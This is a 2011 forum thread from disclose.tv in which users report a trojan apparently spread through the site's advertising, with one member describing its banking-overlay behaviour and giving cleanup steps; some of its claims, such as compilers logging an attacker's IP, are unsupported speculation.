Virus at Dtv

Initiate
User avatar
Posts: 572
Joined: Mon Jul 26, 2010 2:48 am
Location: Between hangovers.

PostFri Dec 09, 2011 6:07 am » by Skydog


So glad i looked in on this thread,seems like all the adverts make this 10 times slower.loving this site,why cant i put an avatar up?seems like all this re -directing and slowness is coming from the ads to me,seems a little bit much to be forced onto an ad site.im just saying,im in uk and had this for coupla weeks.

Conspirator
User avatar
Posts: 4463
Joined: Thu Nov 05, 2009 6:11 am
Location: Earth

PostFri Dec 09, 2011 6:14 am » by Shaggietrip


skydog wrote:So glad i looked in on this thread,seems like all the adverts make this 10 times slower.loving this site,why cant i put an avatar up?seems like all this re -directing and slowness is coming from the ads to me,seems a little bit much to be forced onto an ad site.im just saying,im in uk and had this for coupla weeks.



avatar 4e http://www.disclose.tv/forum/forum-rules-and-terms-of-use-t60332.html

try adblock if on firefox. or chrome if I dare say.

Hope it helps


:hiho: to Dtv


:cheers:
ImageImage
Star watchers,Sun,Moon or just space in interest. https://www.darkskywatcher.com/dsw74.html

Conspirator
User avatar
Posts: 4007
Joined: Wed Feb 16, 2011 9:03 pm

PostFri Dec 09, 2011 1:04 pm » by Rydher


serendipity wrote:Turns out the problem was deeply hidden trojans. Ones with a very high risk level. Kaspersky is finding them. 4 hour scan but worth it and free. Kudos to Rhyder for pointing it out. Yall better check again with kaspersky before you end the day..I got infected and didnt even click the link. :look: :flop:


No problem, I didn't click the link either and was infected just as bad. For my personal computer I'm definitely going back to Kaspersky. I'm not really sure why I ever stopped using it, it's always been rock solid.

Super Moderator
User avatar
Posts: 9120
Joined: Fri May 14, 2010 7:03 pm
Location: Inside You.

PostFri Dec 09, 2011 1:43 pm » by Troll2rocks


I am sorry to be the bearer of bad news but it appears that no matter the link or thread if you logged on in that time frame, you are likely infected.

Go to a previous message I posted on the first page do as I say but I am now seriously telling everyone with "confirmed issues and malware" that you need to go into your system restore and remove all back ups, "YES ALL OF THEM" you then need to do a system boot scan on high awareness in "no network safe mode"...

This will stop any out bound or inbound connections upon boot up, and will make it easier for your anti virus to pinpoint and verify inconsistent registry errors, it will also make sure that the rootkits "which is where those trojans your virus protectors keep finding, are coming from" and make them far more transparent to detection.

It appears that the infection is able to latch into system restore.

WARNING....

Before doing this, you must have a "hardcopy" back up(s) of your system at hand, because once you erase system restore, you will not be able to roll back to a previous date of your system, should the boot scan detect a problem with your system32 and give you no option but ignore or delete (meaning can not be fixed), once removed (the only real option unless you want to live with the infection) you may not be able to boot up again depending on the location of infection (unfortunately it is usually within a directory that is vital)

Backing up your system now before you do as I say above, may be wise, but again depending on where the root cause of infection is, it will only back up the infection too, meaning that once you reinstall windows systems on your computer, it will just put the infection back into your computer.

As I said before that was a nasty little program, from which there is very little adequate defence on the home front.

I would advise Lukas in DTV 2.0 to increase security, even though all security these days is a joke, the model DTV is using, is pretty poor, to say the least, god knows how many thousands of people have been infected.

Anyhow, sorry to break the bad news, but you need to do as I say, ignore me and you may think everything is fine for a week (or however long it takes for the infection to remotely download and install malware your system can no longer fight)

PS if you do leave it and it reaches your motherboard and vital systems, I would have no other way as to describe you as being "fucked".
Image
Censorship debunking & disinformation, it's all in a days work.

Super Moderator
User avatar
Posts: 9120
Joined: Fri May 14, 2010 7:03 pm
Location: Inside You.

PostFri Dec 09, 2011 2:37 pm » by Troll2rocks


2020vision wrote:
troll2rocks wrote:PS if you do leave it and it reaches your motherboard and vital systems, I would have no other way as to describe you as being "fucked".


Since when do viruses or malware affect motherboards? in all the years as an electronics technician i have never seen this, they may in some 'very rare' cases corrupt the Bios granted, but not main system boards.



Oh you no what I mean, I do not mean take over hardware like a ghost lmao, I mean specifically what you stated, my fault for not specifying. I meant the systems vital to keep your computer working and functional.

Not circuit boards lol

:cheers:
Image
Censorship debunking & disinformation, it's all in a days work.

Conspirator
Posts: 1033
Joined: Thu Feb 04, 2010 11:15 am

PostFri Dec 09, 2011 4:17 pm » by Chronicnerd


Actually,

I was hit both at work and home...

Unfortunately, there are a few issues here:

1.) It is a ZBOT Trojan... this one comes up as ZBOT!GENY or ZBOTGENY~ or any offshot from that likeness.
2.) It is *brand new*, as in the binary image of this trojan infection is not known by almost all repositories regarding "digital infections"... well until yesterday it wasn't.
3.) It is a *SMART* trojan virus...and when I mean *SMART*... this was *NOT* some kid or backwoods hacker...this is *VERY* well done...as in the person who implanted this specifically targeted this website and its clients...visitors. (will go into some of the things I have been tracking since yesterday around 7ish in the morning)
4.) It dumps user information to some IP addresses that end up in various places located in EUROPE. When I mean user information...not this site folks...and I will get into this in a bit.
5.) It spreads to *known* system executables as well as looks over network drives and tries to identify *known* common executables as well as things like MSI (installer) files and will wrap a *spoof* launch header onto it...so...as an example...you decide to be *smart* and/or were *smart* and had backups of your data and common install files located...oh say on a NAS drive...yeah...clean install...you start to install your applications... *pow*...you get it again.

The Nasty Part:
This is a *VERY* sophisticated piece of work. It has several proxy servers that dish up templates for specific types of logins...such as banks...trading accounts (i.e. fidelity, etrade, etc)... and the like.
When I say *VERY* sophisticated...as an example...if you login to say...your online banking (Chase, Bank of America, etc). It will wait for your to fully login and then use an IFRAME window (main site goes a little dim) and a window *FORMATED SPECIFICALLY FOR THE THEME OF THE SITE* will pop up and ask for a BUNCH of information claiming they are the bank and just "tightening up their security".

DO NOT FILL OUT OR GIVE OUT ANY INFORMATION TO ANY POPUP AND/OR OVERLAY WHEN YOU LOGIN TO A SITE THAT FALLS INTO THE ABOVE CATEGORY WITHOUT *FIRST* CALLING THE SERVICE AND READING EXACTLY WHAT IT SAYS TO A REPRESENTATIVE OF SAID SERVICE!!!!

How I caught the binary and the headaches it has caused me in the past 24 hours:
At work I helped design our server architecture (although it isn't what I do specifically) and decided to virtualize everything for many purposes. The primary reason being that it allows for easy backup of the entire OS as a full disk image and you can fully utilize a server by running multiple "virtual servers" on one box. The ancillary but now I am thinking *primary* reason in my book as I move forward...is that in the event some major viral infection took place I could simply restore our images from a day or two prior to the estimated time of infection to be 100% sure.

What I ended up seeing was that the virus had made its way into a good number of one of our file servers that hosted "installation files" for various tools and utilities common to my work place. My workstation was always running in a virtualized instance with remoteFX through one of the Hyper-V servers that hosted some virtual workstations...not all people at my workplace had this setup...but luckily the majority of them did not get *hit* as they don't *FREQUENT THIS SITE*... and yes... it came directly from this site.

The virus is more than likely not the owners' fault...per say... as it actually embedded itself inside their ADVERTISING...which belongs to a different group who evidently has *NO CLUE* what they are doing regarding security. Their advertisements *CRAWL* with malware evidently.

So, long story short this "trojan virus" will install itself via several different mechanisms, some through exposed codecs...some through the "click here" to continue...some through those annoying "invisible" popups that were offscreen and would start playing some form of "movie"...I think you guys know what I am talking about...you would click a couple of posts in new tabs...and then start hearing a movie playing...like an advertisement...but see no advertisement. I had noticed this awhile back and just thought :"what a crappy advertisement group"...and figured it was a bug.

Well, it wasn't... it was evidently a group of hackers (which I will tell you who I think they are in a second) that were "testing the waters"... seeing if anyone at the advertisement group would notice...and obviously they didn't...and why I am saying they are *CLUELESS* or just don't care (again...not the site owners' but the advertisement group this site was using...which...if you notice...isn't it odd the advertisements have just "stopped"?).

So...what I did was create a "virtual environment" that was closed off from all resources and reloaded an image prior to the day I got infected... which was Wednesday of this week (the 7th). Sure enough the little binary went to work and was busy infecting all sorts of things... I managed to get several samples of the binary and have submitted them to Microsoft's viral infection group (MS Security Essentials and/or MS End Point Security division) who are updating their tables as well as moving this infection up to the proper groups/authorities that are looking into the sources of where this thing came from.

Anyway, I have the convenience of having multiple pipes coming into my work place...so...I decided to play "follow the white rabbit"... and traced their packets through a packet sniffer and Microsoft Forefront Threat Management Gateway to figure out who I was going to have to kill for trying to screw with not only my personal account information... but my company's information (we deal with specific types of data that require relatively high levels of security)...

I am sure you want IPs... but as I said I have moved this whole thing to the "proper groups" who are now looking into the folks responsible for doing this shit. What I will say is that it looks like the "dumps" of information as well as the "pulls" have come from several locations which appear to be forms of "proxy" servers that then hop to another server which hosts the "fake info popup pages". The cute part was that I managed to enter information that *wasn't* correct for one of the services that I use for financial purposes (not saying which because some of the folks who did this actually have accounts here on this very site). The data was dumped...yet again...to a EUROPE location...but this was more "direct"...although I am sure it is a panzy/temp server that was compromised by this group as they seem to love to piggy back on other peoples shit.

Either case, this looks to be the work of... you ready for this?

Anonymous

Yeah... evidently there were some people who didn't like what was being said on this site... and they decided to "deep six" it... as in sick a bunch of hardcore hackers on it to not just "hack" the site... but screw with everyone on it...as in...make everyone's life miserable...empty bank accounts...pull funds from IRAs or the like... and put an end to not only this site....but most everyone on the site...as in leave a bad taste in everyones' mouth enough to make them "think twice" before being part of a community of this "type"...

Either case, this was something that looks to be started back around June of this year. The images/binaries were actually compiled using a specific compiler that, unknown to many people, actually logs a hash key into the image in order to track things just like this. So, someone somewhere will be getting a nice visit by some friendly men to talk to them about their "SkillZ0rZ"... and then putting them in a very small room for a decade or two to think about what they have done. Information logged was their originating IP, provider IP, machine ID, as well as other information that will make it pretty simple to figure out who the person was who actually hit the "compile" button while constructing this shit.

Either case, I would recommend backing up only your DATA... completely erasing your hard drive... better yet...buy a new hard drive... re-install your OS... re-download any software you might use (i.e. don't even think about using those "backups" of things like Firefox install or the like... more than likely if it was on a NAS and you are in a small network environment...and you have the NAS drive mapped and it was on between the 6th and today....and you hit this site....both it and your computer are infected).

If you think you got "tight security"...then I would highly recommend downloading MICROSOFT SECURITY ESSENTIALS. I will not post a link here, because it just doesn't make sense...google it...verify you are downloading DIRECTLY FROM MICROSOFT...and do a FULL system scan....which will take awhile.

So... this would be the steps:
1.) Download Microsoft Security Essentials FROM MICROSOFT...no CNET...no other location!
2.) Install it and let it update... you should get a relatively new update (like yesterday or it will be out today or tomorrow) which will be able to fully identify this virus/trojan.
3.) Once MS Security Essentials has updated...unplug your computer from the network.
4.) Run a full scan on your computer...depending upon how many files...this could take upwards of 10-15 hours...again...depends upon how many files... if you got less than 1TB then shouldn't take more than a few hours.
5.) If you see something like : ZBOT GEN Y (with any number of characters inbetween) then you got hit... and it would be *highly* recommended that you pretty much clean out both your computer and NAS.

I am not saying just go delete everything.
I am not saying that everyone got infected.
If you are not sure what to do and you are infected... turn your computer off... and either find a friend or family member who knows more about this stuff and can help you only extract DATA...from the drive...
I only *suggest* getting a new drive because it does appear to have the footprint of a "rootkit" trojan and does look like it can open ports typical for both sending and receiving information.

First step... Security Essentials... most other virus detection software will not see this for awhile...and this might very well be a "targeted" virus/trojan (as I suspect)... so it might not be a "wide spread" and not on many other virus protection group's list as having to be "immediately updated"... MS is very aware of this specific event and ~should~ be updating their MSE virus/malware definitions.

Either case, I cannot say what the owners of the site will be doing regarding their advertisements as this looks to be a directly focused attack on the site using the avertisement groups *POOR* security and evidently *CLUELESS* IT folks...who up until yesterday evening had no idea they had been comprimised.

Finally, if you are part of the "scout" group for the Anonymous Tards...you evidently don't realize how many SOFTWARE GIANTS you have pissed off in the past six months...who have already made many adjustments to their compilers...OSs... as well as how information is tagged...

After all... the majority of you guys (Anonymous Tards) are young...don't know that hacking existed before you were born...and there are *some* of us "old guys" who actually helped write the book on hacking.

I hear jail isn't so bad...well... here in America that is... not sure how some of those European countries handle jails...but hey... once you are in jail... you truly will just be some "anonymous" person caught up in a political game...which is the difference between yourselves and say...some of us "older" folks...who have the wisdom to know the difference between right and wrong.

Cheers!

-CN

Conspirator
Posts: 1033
Joined: Thu Feb 04, 2010 11:15 am

PostFri Dec 09, 2011 4:42 pm » by Chronicnerd


chronicnerd wrote:Actually,

I was hit both at work and home...

Unfortunately, there are a few issues here:

1.) It is a ZBOT Trojan... this one comes up as ZBOT!GENY or ZBOTGENY~ or any offshot from that likeness.
2.) It is *brand new*, as in the binary image of this trojan infection is not known by almost all repositories regarding "digital infections"... well until yesterday it wasn't.
3.) It is a *SMART* trojan virus...and when I mean *SMART*... this was *NOT* some kid or backwoods hacker...this is *VERY* well done...as in the person who implanted this specifically targeted this website and its clients...visitors. (will go into some of the things I have been tracking since yesterday around 7ish in the morning)
4.) It dumps user information to some IP addresses that end up in various places located in EUROPE. When I mean user information...not this site folks...and I will get into this in a bit.
5.) It spreads to *known* system executables as well as looks over network drives and tries to identify *known* common executables as well as things like MSI (installer) files and will wrap a *spoof* launch header onto it...so...as an example...you decide to be *smart* and/or were *smart* and had backups of your data and common install files located...oh say on a NAS drive...yeah...clean install...you start to install your applications... *pow*...you get it again.

The Nasty Part:
This is a *VERY* sophisticated piece of work. It has several proxy servers that dish up templates for specific types of logins...such as banks...trading accounts (i.e. fidelity, etrade, etc)... and the like.
When I say *VERY* sophisticated...as an example...if you login to say...your online banking (Chase, Bank of America, etc). It will wait for your to fully login and then use an IFRAME window (main site goes a little dim) and a window *FORMATED SPECIFICALLY FOR THE THEME OF THE SITE* will pop up and ask for a BUNCH of information claiming they are the bank and just "tightening up their security".

DO NOT FILL OUT OR GIVE OUT ANY INFORMATION TO ANY POPUP AND/OR OVERLAY WHEN YOU LOGIN TO A SITE THAT FALLS INTO THE ABOVE CATEGORY WITHOUT *FIRST* CALLING THE SERVICE AND READING EXACTLY WHAT IT SAYS TO A REPRESENTATIVE OF SAID SERVICE!!!!

How I caught the binary and the headaches it has caused me in the past 24 hours:
At work I helped design our server architecture (although it isn't what I do specifically) and decided to virtualize everything for many purposes. The primary reason being that it allows for easy backup of the entire OS as a full disk image and you can fully utilize a server by running multiple "virtual servers" on one box. The ancillary but now I am thinking *primary* reason in my book as I move forward...is that in the event some major viral infection took place I could simply restore our images from a day or two prior to the estimated time of infection to be 100% sure.

What I ended up seeing was that the virus had made its way into a good number of one of our file servers that hosted "installation files" for various tools and utilities common to my work place. My workstation was always running in a virtualized instance with remoteFX through one of the Hyper-V servers that hosted some virtual workstations...not all people at my workplace had this setup...but luckily the majority of them did not get *hit* as they don't *FREQUENT THIS SITE*... and yes... it came directly from this site.

The virus is more than likely not the owners' fault...per say... as it actually embedded itself inside their ADVERTISING...which belongs to a different group who evidently has *NO CLUE* what they are doing regarding security. Their advertisements *CRAWL* with malware evidently.

So, long story short this "trojan virus" will install itself via several different mechanisms, some through exposed codecs...some through the "click here" to continue...some through those annoying "invisible" popups that were offscreen and would start playing some form of "movie"...I think you guys know what I am talking about...you would click a couple of posts in new tabs...and then start hearing a movie playing...like an advertisement...but see no advertisement. I had noticed this awhile back and just thought :"what a crappy advertisement group"...and figured it was a bug.

Well, it wasn't... it was evidently a group of hackers (which I will tell you who I think they are in a second) that were "testing the waters"... seeing if anyone at the advertisement group would notice...and obviously they didn't...and why I am saying they are *CLUELESS* or just don't care (again...not the site owners' but the advertisement group this site was using...which...if you notice...isn't it odd the advertisements have just "stopped"?).

So...what I did was create a "virtual environment" that was closed off from all resources and reloaded an image prior to the day I got infected... which was Wednesday of this week (the 7th). Sure enough the little binary went to work and was busy infecting all sorts of things... I managed to get several samples of the binary and have submitted them to Microsoft's viral infection group (MS Security Essentials and/or MS End Point Security division) who are updating their tables as well as moving this infection up to the proper groups/authorities that are looking into the sources of where this thing came from.

Anyway, I have the convenience of having multiple pipes coming into my work place...so...I decided to play "follow the white rabbit"... and traced their packets through a packet sniffer and Microsoft Forefront Threat Management Gateway to figure out who I was going to have to kill for trying to screw with not only my personal account information... but my company's information (we deal with specific types of data that require relatively high levels of security)...

I am sure you want IPs... but as I said I have moved this whole thing to the "proper groups" who are now looking into the folks responsible for doing this shit. What I will say is that it looks like the "dumps" of information as well as the "pulls" have come from several locations which appear to be forms of "proxy" servers that then hop to another server which hosts the "fake info popup pages". The cute part was that I managed to enter information that *wasn't* correct for one of the services that I use for financial purposes (not saying which because some of the folks who did this actually have accounts here on this very site). The data was dumped...yet again...to a EUROPE location...but this was more "direct"...although I am sure it is a panzy/temp server that was compromised by this group as they seem to love to piggy back on other peoples shit.

Either case, this looks to be the work of... you ready for this?

Anonymous

Yeah... evidently there were some people who didn't like what was being said on this site... and they decided to "deep six" it... as in sick a bunch of hardcore hackers on it to not just "hack" the site... but screw with everyone on it...as in...make everyone's life miserable...empty bank accounts...pull funds from IRAs or the like... and put an end to not only this site....but most everyone on the site...as in leave a bad taste in everyones' mouth enough to make them "think twice" before being part of a community of this "type"...

Either case, this was something that looks to be started back around June of this year. The images/binaries were actually compiled using a specific compiler that, unknown to many people, actually logs a hash key into the image in order to track things just like this. So, someone somewhere will be getting a nice visit by some friendly men to talk to them about their "SkillZ0rZ"... and then putting them in a very small room for a decade or two to think about what they have done. Information logged was their originating IP, provider IP, machine ID, as well as other information that will make it pretty simple to figure out who the person was who actually hit the "compile" button while constructing this shit.

Either case, I would recommend backing up only your DATA... completely erasing your hard drive... better yet...buy a new hard drive... re-install your OS... re-download any software you might use (i.e. don't even think about using those "backups" of things like Firefox install or the like... more than likely if it was on a NAS and you are in a small network environment...and you have the NAS drive mapped and it was on between the 6th and today....and you hit this site....both it and your computer are infected).

If you think you got "tight security"...then I would highly recommend downloading MICROSOFT SECURITY ESSENTIALS. I will not post a link here, because it just doesn't make sense...google it...verify you are downloading DIRECTLY FROM MICROSOFT...and do a FULL system scan....which will take awhile.

So... this would be the steps:
1.) Download Microsoft Security Essentials FROM MICROSOFT...no CNET...no other location!
2.) Install it and let it update... you should get a relatively new update (like yesterday or it will be out today or tomorrow) which will be able to fully identify this virus/trojan.
3.) Once MS Security Essentials has updated...unplug your computer from the network.
4.) Run a full scan on your computer...depending upon how many files...this could take upwards of 10-15 hours...again...depends upon how many files... if you got less than 1TB then shouldn't take more than a few hours.
5.) If you see something like : ZBOT GEN Y (with any number of characters inbetween) then you got hit... and it would be *highly* recommended that you pretty much clean out both your computer and NAS.

I am not saying just go delete everything.
I am not saying that everyone got infected.
If you are not sure what to do and you are infected... turn your computer off... and either find a friend or family member who knows more about this stuff and can help you only extract DATA...from the drive...
I only *suggest* getting a new drive because it does appear to have the footprint of a "rootkit" trojan and does look like it can open ports typical for both sending and receiving information.

First step... Security Essentials... most other virus detection software will not see this for awhile...and this might very well be a "targeted" virus/trojan (as I suspect)... so it might not be a "wide spread" and not on many other virus protection group's list as having to be "immediately updated"... MS is very aware of this specific event and ~should~ be updating their MSE virus/malware definitions.

Either case, I cannot say what the owners of the site will be doing regarding their advertisements as this looks to be a directly focused attack on the site using the avertisement groups *POOR* security and evidently *CLUELESS* IT folks...who up until yesterday evening had no idea they had been comprimised.

Finally, if you are part of the "scout" group for the Anonymous Tards...you evidently don't realize how many SOFTWARE GIANTS you have pissed off in the past six months...who have already made many adjustments to their compilers...OSs... as well as how information is tagged...

After all... the majority of you guys (Anonymous Tards) are young...don't know that hacking existed before you were born...and there are *some* of us "old guys" who actually helped write the book on hacking.

I hear jail isn't so bad...well... here in America that is... not sure how some of those European countries handle jails...but hey... once you are in jail... you truly will just be some "anonymous" person caught up in a political game...which is the difference between yourselves and say...some of us "older" folks...who have the wisdom to know the difference between right and wrong.

Cheers!

-CN



Looks like they are on it (man I like Microsoft...they really are cool peeps):
Definitions Created on: 12/9/2011 at 4:51 AM
Virus definition version: 1.117.718.0
Spyware definition version: 1.117.718.0

So, Miscorosft Security Essentials looks to have the updated definitions already available....

Its free... Mircosoft owns the OS...and they have what I would say are the best if not the very top of the best Tech guys on this planet... IT to Programming... and they work 24 hours a day (rotate between offices around the globe)...

Again...not posting a link here just for security purposes... download directly from Microsoft...

Cheers,

-CN

Conspirator
User avatar
Posts: 8096
Joined: Fri Mar 12, 2010 9:08 am
Location: Next door

PostSat Dec 10, 2011 2:09 am » by Malogg


Noticed virus on's dtv for the last 3 or 4 months a virus would pop up every now and then.

Only solution once infected is to wipe hard drive ie reformat and slap a fresh operating system in just a complete nightmare installing drivers again if it is a fecken laptop like mine sony vaio fw21e which you get no drivers with it and had to hunt online for a disc with the original drivers but still the BD Rom driver is a dud :(

got a new sat toshiba laptop that aint getting connected to the net or dodgy external drives or copied discs jizzed into it as im using it for writing music and I know how easy it is to get a dam virus had loads in the past and the only true way to kill em is to wipe the slate clean and start again.

Anyone that attacks folks with a fecking virus is a faggot that I only wish KARMA a zillion fold on and bad shits for a week or two!. :P
HAHA Image


PreviousNext

  • Related topics
    Replies
    Views
    Last post
Visit Disclose.tv on Facebook